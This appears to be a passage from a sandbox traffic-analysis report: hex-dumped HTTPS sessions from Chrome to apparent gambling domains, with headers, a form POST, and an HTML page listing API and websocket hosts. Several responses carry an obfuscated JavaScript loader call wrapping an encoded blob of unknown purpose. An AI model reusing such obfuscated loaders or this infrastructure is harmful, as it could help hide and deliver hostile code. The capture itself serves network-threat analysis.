                                                                                                                                                          2024-06-09 22:41:04 UTC15753INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 6e 77 44 59 41 61 66 41 54 67 41 59 42 64 45 67 62 77 43 49 42 71 41 44 69 59 47 59 47 41 75 41 4d 77 46 63 30 4d 41 43 34 42 4c 64 4a 69 45 6b 51 4a 45 51 45 6f 36 41 4e 79 67 41 6e 41 41 52 6f 41 33 47 67 43 38 2f 51 61 50 48 79 47 66 4a 43 46 56 49 68 79 6b 63 49 59 61 6c 61 79 53 47 31 30 30 55 41 4c 59 67 75 44 41 46 34 41 4c 41 50 6f 41 77 67 42 79 44 43 51 65 53 45 68 51 41 4f 59 67 53 46 78 30 55 44 78 43 49 4d 71 38 41 73 4a 69 61 42 4a 53 38 73 6f 67 51 6e 7a 4b 61 41 79 71 7a 45 4a 4d 44 49 43 6a 2b 6f 44 65 47 59 41 55 36 73 77 67 32 44 53 56 67 4e 4a 79 67 48 41 71 44 41 43 2b 4a 46 41 41 4e 68 43 2b 55 50 34 41 4a 6c 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJnwDYAafATgAYBdEgbwCIBqADiYGYGAuAMwFc0MAC4BLdJiEkQJEQEo6ANygAnAARoA3GgC8/QaPHyGfJCFVIhykcIYalaySG100UALYguDAF4ALAPoAwgByDCQeSEhQAOYgSFx0UDxCIMq8AsJiaBJS8sogQnzKaAyqzEJMDICj+oDeGYAU6swg2DSVgNJygHAqDAC+JFAANhC+UP4AJlB
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 35 59 37 76 46 6a 57 42 6e 55 71 41 5a 49 4b 6f 47 4f 4e 30 6e 74 6e 4a 35 75 57 47 6b 46 64 74 67 42 71 33 37 41 63 55 70 4a 38 74 6d 68 66 76 48 58 67 64 67 4a 46 2b 68 79 78 66 34 76 4b 4e 52 4c 79 51 47 53 2f 65 7a 49 32 6b 38 4f 69 70 6c 35 41 44 5a 65 33 51 75 58 30 7a 78 68 69 67 44 34 41 59 41 75 43 65 5a 33 78 6a 4b 2f 68 66 4b 76 6c 41 56 51 41 51 42 71 2b 65 6f 36 76 31 67 4a 4c 79 6c 2b 61 2f 70 65 32 76 32 58 6a 6e 61 6c 68 33 69 78 63 35 50 35 6d 38 6b 31 31 39 64 73 52 6d 51 54 53 43 65 5a 37 61 4b 34 6d 4f 69 45 67 59 58 70 64 4b 4e 2f 47 39 45 41 44 46 36 73 49 63 35 4e 34 53 38 7a 65 47 76 63 33 74 4c 36 31 36 67 42 5a 66 4e 76 45 6f 55 7a 2b 77 42 67 44 34 41 30 69 72 6e 41 6f 39 57 42 2b 51 46 47 61 52 4b 51 4c 4f 4a 67 48 43 34 78 66
                                                                                                                                                          Data Ascii: 5Y7vFjWBnUqAZIKoGON0ntnJ5uWGkFdtgBq37AcUpJ8tmhfvHXgdgJF+hyxf4vKNRLyQGS/ezI2k8Oipl5ADZe3QuX0zxhigD4AYAuCeZ3xjK/hfKvlAVQAQBq+eo6v1gJLyl+a/pe2v2Xjnalh3ixc5P5m8k119dsRmQTSCeZ7aK4mOiEgYXpdKN/G9EADF6sIc5N4S8zeGvc3tL616gBZfNvEoUz+wBgD4A0irnAo9WB+QFGaRKQLOJgHC4xf
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 53 2b 79 59 59 33 50 64 75 74 38 71 62 4f 75 6a 32 53 75 57 6d 48 54 71 4d 5a 43 71 75 57 38 70 61 51 48 45 4b 78 71 59 39 4b 77 2b 36 46 72 63 58 51 39 34 7a 71 51 51 6d 7a 6e 6b 66 49 75 4e 7a 33 41 45 67 34 4c 71 6b 71 61 4c 50 77 4b 2b 6b 73 67 75 45 5a 31 6b 72 59 50 45 4c 71 75 5a 4a 37 68 75 34 30 76 74 32 35 35 7a 55 75 6f 75 48 54 39 61 75 6c 61 49 7a 65 69 35 34 48 4e 52 31 61 75 41 37 33 53 6e 43 2b 59 47 55 4c 38 53 38 6b 48 69 42 42 72 75 4e 4b 47 32 39 55 6f 55 75 4b 4c 76 52 6f 77 76 63 4c 36 65 43 35 6d 68 4a 68 68 61 4b 39 7a 50 4b 57 4f 46 39 6a 46 7a 35 4d 49 62 4f 79 2b 33 5a 52 4f 61 4b 68 71 71 79 57 62 54 73 55 76 66 4f 54 61 2b 7a 67 41 76 4b 61 79 6d 71 51 42 61 2b 69 38 75 4e 4e 35 61 71 38 39 44 4c 2b 79 6a 68 72 50 50 78 50 43
                                                                                                                                                          Data Ascii: S+yYY3Pdut8qbOuj2SuWmHTqMZCquW8paQHEKxqY9Kw+6FrcXQ94zqQQmznkfIuNz3AEg4LqkqaLPwK+ksguEZ1krYPELquZJ7hu40vt255zUuouHT9aulaIzei54HNR1auA73SnC+YGUL8S8kHiBBruNKG29UoUuKLvRowvcL6eC5mhJhhaK9zPKWOF9jFz5MIbOy+3ZROaKhqqyWbTsUvfOTa+zgAvKaymqQBa+i8uNN5aq89DL+yjhrPPxPC
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 74 66 6c 71 36 4c 68 42 48 38 76 49 41 35 4d 71 58 6c 46 76 56 34 71 74 4e 53 6c 6c 61 37 4c 45 57 44 73 6f 59 4a 50 71 68 6c 55 2b 58 46 64 6c 69 2f 58 64 6c 7a 77 76 55 42 56 6f 78 34 32 4f 49 31 52 36 31 39 54 73 4a 6e 4f 79 48 4d 41 35 4d 65 46 76 50 49 6f 56 69 78 50 70 47 31 43 74 68 47 5a 68 49 43 4a 6e 43 75 38 4a 54 43 73 52 6c 51 30 75 58 70 5a 52 32 73 70 34 74 51 34 56 42 78 7a 6f 56 4e 43 74 61 4a 4c 41 44 34 56 67 30 75 6a 4a 39 73 70 48 4a 6a 73 75 73 41 46 34 6d 4e 59 53 72 6c 49 56 6e 78 79 58 4a 66 42 4b 52 4a 67 51 6f 49 41 59 68 49 58 5a 41 56 51 37 36 42 77 78 6b 4a 35 6c 55 50 65 36 37 53 49 71 71 56 58 63 36 4e 73 7a 62 46 58 76 51 64 75 2b 68 49 5a 4b 2b 68 4d 42 65 2b 64 51 64 75 44 4a 51 5a 4b 51 74 78 62 32 74 58 42 4c 36 63 31
                                                                                                                                                          Data Ascii: tflq6LhBH8vIA5MqXlFvV4qtNSlla7LEWDsoYJPqhlU+XFdli/XdlzwvUBVox42OI1R619TsJnOyHMA5MeFvPIoVixPpG1CthGZhICJnCu8JTCsRlQ0uXpZR2sp4tQ4VBxzoVNCtaJLAD4Vg0ujJ9spHJjsusAF4mNYSrlIVnxyXJfBKRJgQoIAYhIXZAVQ76BwxkJ5lUPe67SIqqVXc6NszbFXvQdu+hIZK+hMBe+dQduDJQZKQtxb2tXBL6c1
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 62 33 6d 55 61 4a 76 6e 36 62 44 71 49 53 38 78 2b 58 58 4a 4b 54 68 58 69 38 56 68 6e 34 4a 6d 33 33 57 34 41 6d 43 45 32 41 33 35 41 4a 78 6d 6e 68 43 7a 47 38 38 36 54 4a 43 4a 45 6a 59 35 7a 45 61 77 39 57 41 32 77 59 67 4f 65 6e 49 63 36 51 70 4a 32 35 68 49 39 54 45 6f 33 35 33 57 61 33 6a 41 72 6f 78 4f 32 38 4f 51 6e 5a 44 73 46 78 47 47 64 59 55 73 35 66 49 48 43 2b 54 6e 77 63 7a 51 45 74 32 41 74 48 35 44 42 66 41 5a 41 42 4b 4a 61 63 4a 36 33 6b 57 32 71 32 65 57 79 30 57 30 67 31 75 78 2b 53 34 6d 51 4d 55 31 5a 6e 59 69 36 68 42 69 73 79 2b 32 51 30 2b 76 6d 47 5a 50 65 32 34 6d 32 2b 32 45 43 34 4b 48 67 43 32 5a 57 46 77 4e 2b 33 36 6d 79 2b 49 6c 38 2b 4b 58 43 38 34 77 58 7a 41 44 59 6e 47 35 46 42 33 71 43 78 6e 47 52 38 35 2b 32 78 38
                                                                                                                                                          Data Ascii: b3mUaJvn6bDqIS8x+XXJKThXi8Vhn4Jm33W4AmCE2A35AJxmnhCzG886TJCJEjY5zEaw9WA2wYgOenIc6QpJ25hI9TEo353Wa3jAroxO28OQnZDsFxGGdYUs5fIHC+TnwczQEt2AtH5DBfAZABKJacJ63kW2q2eWy0W0g1ux+S4mQMU1ZnYi6hBisy+2Q0+vmGZPe24m2+2EC4KHgC2ZWFwN+36my+Il8+KXC84wXzADYnG5FB3qCxnGR85+2x8
                                                                                                                                                          2024-06-09 22:41:04 UTC371INData Raw: 51 30 4e 5a 41 31 46 44 4e 6f 41 78 51 63 4e 42 62 51 4b 4f 41 50 38 68 6c 41 4d 4b 59 62 34 69 71 41 49 45 41 54 43 41 79 6b 4e 2b 75 44 4e 36 6f 41 4f 4b 47 68 53 6f 72 59 59 65 59 48 38 52 79 38 43 41 41 67 38 42 31 68 6d 64 47 57 4b 53 4a 4b 46 46 45 45 63 68 70 4b 4e 67 67 4c 66 71 58 42 4d 31 68 4d 51 53 79 35 4a 76 36 78 61 52 52 32 50 6c 68 37 47 46 2f 54 6d 2f 51 31 59 41 34 67 4b 56 68 6f 75 69 47 4a 4c 45 45 77 30 51 4c 59 45 68 67 51 52 68 32 52 43 46 68 37 5a 59 46 74 75 48 45 44 61 51 50 78 48 4a 67 72 59 69 4a 59 52 78 68 61 41 35 2b 70 44 57 45 51 77 52 37 68 6a 75 6f 44 4c 68 45 4f 4a 34 41 36 45 52 39 59 58 41 41 6c 6d 48 2b 57 4c 47 49 52 33 68 66 30 43 6c 77 63 6a 6a 42 4a 4d 7a 51 64 4c 67 46 59 57 45 6b 79 53 51 74 70 4e 6e 75 51 36
                                                                                                                                                          Data Ascii: Q0NZA1FDNoAxQcNBbQKOAP8hlAMKYb4iqAIEATCAykN+uDN6oAOKGhSorYYeYH8Ry8CAAg8B1hmdGWKSJKFFEEchpKNggLfqXBM1hMQSy5Jv6xaRR2Plh7GF/Tm/Q1YA4gKVhouiGJLEEw0QLYEhgQRh2RCFh7ZYFtuHEDaQPxHJgrYiJYRxhaA5+pDWEQwR7hjuoDLhEOJ4A6ER9YXAAlmH+WLGIR3hf0ClwcjjBJMzQdLgFYWEkySQtpNnuQ6


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          268192.168.2.55002390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC558OUTGET /pc/240516-03/static/js/components/367/headerTip.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:04 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:04 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2900
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:20 GMT
                                                                                                                                                          ETag: "6645caac-b54"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[6],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE9[330],EU-GER-frankfurt-GLOBAL1-CACHE9[328,TCP_MISS,329],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 363d6237fefa7a0e4dafc75de4251732
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1121435
                                                                                                                                                          X-CCDN-Expires: 1470565
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:04 UTC2900INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 4c 41 54 67 47 59 42 64 41 47 67 47 38 41 54 41 4e 77 42 63 42 70 41 4c 67 44 4d 42 58 4e 47 57 67 53 33 55 31 74 4a 43 6b 75 41 53 6e 49 41 69 56 6b 68 41 41 43 4a 4c 51 42 4f 58 54 6d 49 44 63 41 65 54 41 41 72 45 4a 77 42 30 6c 45 4d 79 35 6f 51 41 42 58 6b 6f 49 49 65 62 51 43 65 6d 51 57 49 44 36 54 6b 45 67 43 79 4b 53 71 77 41 32 49 4d 52 54 55 55 44 36 73 49 49 77 41 68 41 41 4d 41 4c 37 43 4b 6b 48 79 73 67 43 38 58 4a 68 69 6b 54 41 51 7a 47 4c 43 70 47 68 4a 35 47 68 51 41 4c 5a 68 59 74 77 51 53 41 41 79 58 48 49 42 6c 46 43 30 55 43 7a 73 6e 44 78 6f 6d 4b 4c 79 49 4c 53 73 38 6d 6a 6b 4d 4a 52 6f 70 6f 30 41 46 6f 78 49 2b 6f 5a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALATgGYBdAGgG8ATANwBcBpALgDMBXNGWgS3U1tJCkuASnIAiVkhAACJLQBOXTmIDcAeTAArEJwB0lEMy5oQABXkoIIebQCemQWID6TkEgCyKSqwA2IMRTUUD6sIIwAhAAMAL7CKkHysgC8XJhikTAQzGLCpGhJ5GhQALZhYtwQSAAyXHIBlFC0UCzsnDxomKLyILSs8mjkMJRopo0AFoxI+oZ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          269192.168.2.55001638.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC728OUTPOST /mobile-api/v5/origin/getFloat.html HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 68
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://x551005.com
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:04 UTC68OUTData Raw: 6c 6f 63 61 6c 65 3d 7a 68 5f 43 4e 26 74 65 72 6d 69 6e 61 6c 3d 70 63 26 69 73 5f 6e 61 74 69 76 65 3d 66 61 6c 73 65 26 76 65 72 73 69 6f 6e 3d 76 33 30 35 35 26 72 65 73 6f 6c 75 74 69 6f 6e 3d 32 78
                                                                                                                                                          Data Ascii: locale=zh_CN&terminal=pc&is_native=false&version=v3055&resolution=2x
                                                                                                                                                          2024-06-09 22:41:05 UTC21INHTTP/1.1 605 unknow
                                                                                                                                                          2024-06-09 22:41:05 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:05 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 35 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          2024-06-09 22:41:05 UTC60INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 72 6f 75 74 65 3d 36 31 65 65 38 34 63 39 66 36 38 32 33 36 33 30 39 64 61 37 30 35 32 36 31 64 66 31 30 65 35 61 3b 20 50 61 74 68 3d 2f 0d 0a
                                                                                                                                                          Data Ascii: Set-Cookie: route=61ee84c9f68236309da705261df10e5a; Path=/
                                                                                                                                                          2024-06-09 22:41:05 UTC50INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 78 35 35 31 30 30 35 2e 63 6f 6d 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: https://x551005.com
                                                                                                                                                          2024-06-09 22:41:05 UTC33INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Methods: *
                                                                                                                                                          2024-06-09 22:41:05 UTC30INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 36 30 30 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Max-Age: 3600
                                                                                                                                                          2024-06-09 22:41:05 UTC74INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 41 63 63 65 73 73 2d 54 6f 6b 65 6e 2c 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Headers: Content-Type,Access-Token,X-Requested-With
                                                                                                                                                          2024-06-09 22:41:05 UTC19INData Raw: 68 65 61 64 65 72 53 74 61 74 75 73 3a 20 36 30 35 0d 0a
                                                                                                                                                          Data Ascii: headerStatus: 605
                                                                                                                                                          2024-06-09 22:41:05 UTC23INData Raw: 69 70 53 74 72 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                          Data Ascii: ipStr: 173.254.250.91


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          270192.168.2.55001738.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC621OUTGET /ftl/commonPage/images/partner/partner-hongtu-white.png HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:05 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:05 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:05 UTC24INData Raw: 45 54 61 67 3a 20 22 36 36 31 33 62 39 32 37 2d 31 32 33 36 63 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "6613b927-1236c"
                                                                                                                                                          2024-06-09 22:41:05 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:23:58 GMT
                                                                                                                                                          2024-06-09 22:41:05 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/png
                                                                                                                                                          2024-06-09 22:41:05 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 38 20 41 70 72 20 32 30 32 34 20 30 39 3a 33 30 3a 31 35 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Mon, 08 Apr 2024 09:30:15 GMT
                                                                                                                                                          2024-06-09 22:41:05 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:05 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:05 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:23:58 GMT
                                                                                                                                                          2024-06-09 22:41:05 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:41:05 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          271192.168.2.550025202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC697OUTGET /default.html HTTP/1.1
                                                                                                                                                          Host: js326.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:41:05 UTC404INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:05 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 35313
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Fri, 18 Aug 2023 04:30:01 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "64def3c9-89f1"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:05 UTC15980INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 2e 69 6e 69 74 2d 69 70 2d 62 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <meta charset=utf-8> <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"> <title></title> <style> .init-ip-block{position: fixed;top: 0;left: 0;background-color
                                                                                                                                                          2024-06-09 22:41:05 UTC16384INData Raw: 20 20 22 77 73 73 61 2d 33 36 31 2e 69 78 69 61 6f 73 68 69 7a 69 2e 63 6f 6d 3a 31 37 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 77 73 73 61 2d 33 35 31 2e 74 61 69 6a 75 65 74 61 69 71 75 61 6e 64 61 6f 2e 63 6f 6d 3a 31 36 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 77 77 77 62 79 66 65 6e 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 68 79 64 71 65 66 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 77 73 2e 62 61 6b 65 64 64 6f 76 65 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 6b 61 2e 62 6c 61 63 6b 6b 68 61 6b 69 39 31 38 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20
                                                                                                                                                          Data Ascii: "wssa-361.ixiaoshizi.com:1785", "wssa-351.taijuetaiquandao.com:1685", "ocsapi1962.wwwbyfen.com", "ocsapi1962.hydqef.com", "ocsapi-aws.bakeddove.com", "ocsapi-aka.blackkhaki918.com",
